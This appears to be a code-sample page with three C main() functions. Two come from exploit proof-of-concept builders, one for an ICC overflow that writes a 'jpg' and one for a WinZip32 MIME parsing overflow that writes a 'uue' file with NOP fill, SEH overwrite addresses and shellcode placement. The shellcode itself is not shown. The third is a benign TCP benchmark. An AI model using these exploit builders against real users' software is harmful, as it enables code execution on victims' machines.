Пример #1
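/*
 * Builds the PoC 'jpg' file for one entry of targets[].  The entry is chosen
 * by the optional first argument (1-based), defaulting to TARGET.
 * Returns 0 on success, 1 when the target number is malformed or < 1.
 */
int main(int argc, char *argv[]) 
{
	int t=TARGET;

	if (argc==2) {
		char *end=NULL;
		long v=strtol(argv[1], &end, 10);

		/* atoi() would silently turn non-numeric input into 0, and 0-1 would
		 * then index before the start of targets[]; reject it explicitly. */
		if (end==argv[1] || *end!='\0') {
			fprintf(stderr, "Invalid target number: '%s'\n", argv[1]);
			return 1;
		}
		t=(int)v;
	}

	/* t-1 indexes targets[]; only the lower bound is known here.
	 * TODO(review): also bound t by the number of entries in targets[]
	 * (the array is defined elsewhere in the file). */
	if (t<1) {
		fprintf(stderr, "Invalid target number: %d\n", t);
		return 1;
	}

	get_bytes(targets[t-1].jmpADD);

	printf("\nICC Overflow PoC, By Snooq [[email protected]]\n\n");

	printf("-> Generating 'jpg' file for target #%d...\n",t);

	filladdr();
	fillshellcode();
	buildfile();

	return 0;
}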
Пример #2
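/*
 * Builds the PoC 'uue' file for one entry of targets[].  The entry is chosen
 * by the optional first argument (1-based), defaulting to TARGET; its topSEH
 * and jmpADD fields are published through the globals `where` and `what`
 * before the buffer is assembled and written by buildfile().
 * Returns 0 on success, 1 when the target number is malformed or < 1.
 */
int main(int argc, char *argv[]) 
{
	int t=TARGET;

	if (argc==2) {
		char *end=NULL;
		long v=strtol(argv[1], &end, 10);

		/* atoi() would silently turn non-numeric input into 0, and 0-1 would
		 * then index before the start of targets[]; reject it explicitly. */
		if (end==argv[1] || *end!='\0') {
			fprintf(stderr, "Invalid target number: '%s'\n", argv[1]);
			return 1;
		}
		t=(int)v;
	}

	/* t-1 indexes targets[]; only the lower bound is known here.
	 * TODO(review): also bound t by the number of entries in targets[]
	 * (the array is defined elsewhere in the file). */
	if (t<1) {
		fprintf(stderr, "Invalid target number: %d\n", t);
		return 1;
	}

	where=targets[t-1].topSEH;
	what=targets[t-1].jmpADD;

	printf("\nWinZip32 MIME Parsing Overflow PoC, By Snooq [[email protected]]\n\n");

	/* buff is filled with NOP, then header / addresses / shellcode are laid
	 * over it at fixed offsets; the offsets and sizes are file-scope constants
	 * and are not validated against BSIZE here. */
	memset(buff,NOP,BSIZE);
	printf("-> Generating 'uue' file for target #%d...\n",t);
	memcpy(buff,header,HSIZE);
	filladdr();
	memcpy(buff+HSIZE+IDXOFF+4+PAD,shellcode,SSIZE);
	buildfile();

	return 0;
}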
Пример #3
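/*
 * Server role: bind to `addr`, accept connections forever and hand each one
 * to its own rr_thread.  Each rr is heap-allocated here and freed by the
 * thread.  Dies via PERROR_DIE/ERROR_DIE on any failure; does not return.
 */
static void
run_server(const struct sockaddr_in *addr)
{
  int one = 1;
  int so;
  int new_conn;
  int id = 0;

  so = socket(AF_INET, SOCK_STREAM, 0);
  if (so < 0) {
    PERROR_DIE("socket");
  }
  if (0 != setsockopt(so, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one))) {
    PERROR_DIE("setsockopt(SO_REUSEADDR)");
  }
  if (0 != bind(so, (const struct sockaddr*)addr, sizeof(*addr))) {
    PERROR_DIE("bind");
  }
  if (0 != listen(so, args_backlog)) {
    PERROR_DIE("listen");
  }
  /* accept() returns -1 on error; 0 is a legal descriptor (e.g. when stdin
   * is closed), so the loop must not stop on it. */
  while ((new_conn = accept(so, NULL, NULL)) >= 0) {
    struct rr *r;

    log_msg("server accepted a conn. so=%d id=%d\n", new_conn, id);

    // We want to use threads, not events, for this test
    r = calloc(1, sizeof(*r));
    if (r == NULL) {
      PERROR_DIE("calloc");
    }
    r->id = id++;
    r->so = new_conn;
    r->server = 1;
    pthread_attr_init(&r->attr);
    pthread_attr_setscope(&r->attr, PTHREAD_SCOPE_SYSTEM);
    /* pthread_create reports failure as its return value, not via errno. */
    if (0 != pthread_create(&r->tid, &r->attr, rr_thread, r)) { // thread frees r
      ERROR_DIE("pthread_create\n");
    }
  }
  PERROR_DIE("accept");
}

/*
 * Client role: open args_t connections to `addr`, start one rr_thread per
 * connection (msg_len/sleep come from -m/-sleep; what rr_thread does with
 * them is defined elsewhere), then print aggregated per-second statistics
 * forever.  Dies via PERROR_DIE/ERROR_DIE on any failure; does not return.
 */
static void
run_client(const struct sockaddr_in *addr)
{
  struct rr *ra;
  struct hist prev_hist, cur_hist;
  uint32_t prev_count;

  /* args_t is validated > 0 by main before we get here. */
  ra = calloc((size_t)args_t, sizeof(*ra));
  if (ra == NULL) {
    PERROR_DIE("calloc");
  }
  for (int i = 0; i < args_t; i++) {
    struct rr *r = &ra[i];
    int so = socket(AF_INET, SOCK_STREAM, 0);

    if (so < 0) {
      PERROR_DIE("socket");
    }
    if (0 != connect(so, (const struct sockaddr*)addr, sizeof(*addr))) {
      PERROR_DIE("connect");
    }

    log_msg("connected to server. so=%d id=%d\n", so, i);

    r->id = i;
    r->so = so;
    r->msg_len = args_m;
    r->sleep = args_sleep;
    pthread_attr_init(&r->attr);
    pthread_attr_setscope(&r->attr, PTHREAD_SCOPE_SYSTEM);
    /* pthread_create reports failure as its return value, not via errno. */
    if (0 != pthread_create(&r->tid, &r->attr, rr_thread, r)) {
      ERROR_DIE("pthread_create\n");
    }
  }

  // Print stats forever
  memset(&prev_hist, 0, sizeof(prev_hist));
  prev_count = 0;
  for (;;) {
    uint32_t cur_count = 0;

    sleep(1);

    // Gather stats from threads (the counters are read without locking,
    // as in the original test; a torn read only skews one sample)
    memset(&cur_hist, 0, sizeof(cur_hist));
    for (int i = 0; i < args_t; i++) {
      struct rr *r = &ra[i];
      cur_count += r->stat_count;
      for (int j = 0; j < HIST_BIN_COUNT; j++) {
        cur_hist.bin[j] += r->hist.bin[j];
      }
    }

    /* Rate over the last second, then per-bin cumulative count with the
     * delta since the previous sample in brackets. */
    printf("%u request-responses/s\n", cur_count - prev_count);
    for (int i = 0; i < HIST_BIN_COUNT; i++) {
      printf("%d: %u[%u]\n", ((i+1) * HIST_BIN_WIDTH),
        cur_hist.bin[i], cur_hist.bin[i] - prev_hist.bin[i]);
    }

    prev_count = cur_count;
    prev_hist = cur_hist; // struct copy
#if CHECK_RTO_RETRANS
    print_checker();
#endif
  }
}

/*
 * Entry point for the request/response socket test.  parse_args() fills the
 * args_* globals; they are validated here, -addr/-port are resolved into
 * `addr`, the optional RTO/retransmit checker threads are started, and then
 * either the server role (-s) or the client role runs.  Neither role returns
 * on success, so the final `return 0` is only reached if one of them does.
 */
int
main(int argc, char *argv[])
{
  struct sockaddr_in addr;

  parse_args(argc, argv);

  if (args_addr == NULL) {
    ERROR_DIE("-addr is missing\n");
  }
  if (args_port <= 0) {
    ERROR_DIE("-port is missing\n");
  }
  if (args_m <= 0) {
    ERROR_DIE("-m must be > 0\n");
  }
  if (args_m > 8*1024) {
    ERROR_DIE("-m must be <= 8192\n");
  }
  if (args_sleep < 0) {
    ERROR_DIE("-sleep must be >= 0\n");
  }
  /* args_t sizes the client connection array; 0 or negative would start no
   * threads and print zeros forever.  The option name follows the
   * args_<name> pattern above -- confirm against parse_args. */
  if (!args_s && args_t <= 0) {
    ERROR_DIE("-t must be > 0\n");
  }

  memset(&addr, 0, sizeof(addr));
  if (0 != filladdr(args_addr, &addr)) {
    ERROR_DIE("filladdr\n");
  }
  addr.sin_port = htons(args_port);

#if CHECK_RTO_RETRANS
  pthread_mutex_init(&checker_lock, NULL);
  checker_so_num = 0;
  memset(checker_so, -1, sizeof(checker_so));
  {
    pthread_attr_t attr;
    pthread_t tid;
    pthread_attr_init(&attr);
    pthread_attr_setscope(&attr, PTHREAD_SCOPE_SYSTEM);
    pthread_create(&tid, &attr, check_thread, NULL);
    if (args_s)
      pthread_create(&tid, &attr, stat_thread, NULL);
  }
#endif

  if (args_s) {
    run_server(&addr);
  }
  else {
    run_client(&addr);
  }

  return 0;
}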